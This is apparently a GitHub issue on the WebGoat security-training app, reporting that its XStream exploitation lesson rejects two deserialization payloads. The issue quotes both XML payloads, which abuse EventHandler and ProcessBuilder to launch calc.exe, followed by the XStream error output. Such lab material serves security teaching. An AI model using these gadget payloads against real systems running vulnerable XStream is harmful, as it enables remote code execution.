"Exploiting XStream" assignment does not work #1134
Description
I have tried the following variations that are "supposed" to work as mentioned in:
- The hint: https://x-stream.github.io/CVE-2013-7285.html,
- In the Test file: https://github.com/WebGoat/WebGoat/blob/main/webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLessonTest.java:
<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact><contact class='dynamic-proxy'>
<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
<handler class='java.beans.EventHandler'>
<target class='java.lang.ProcessBuilder'>
<command>
<string>calc.exe</string>
</command>
</target>
<action>start</action>
</handler>
</contact>Both give similar errors like so:
Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
---- Debugging information ----
message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
cause-exception : com.thoughtworks.xstream.converters.reflection.ObjectAccessException
cause-message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
class : org.owasp.webgoat.vulnerable_components.Contact
required-type : org.owasp.webgoat.vulnerable_components.Contact
converter-type : com.thoughtworks.xstream.converters.reflection.ReflectionConverter
path : /contact
line number : 1
version : 1.4.5
-------------------------------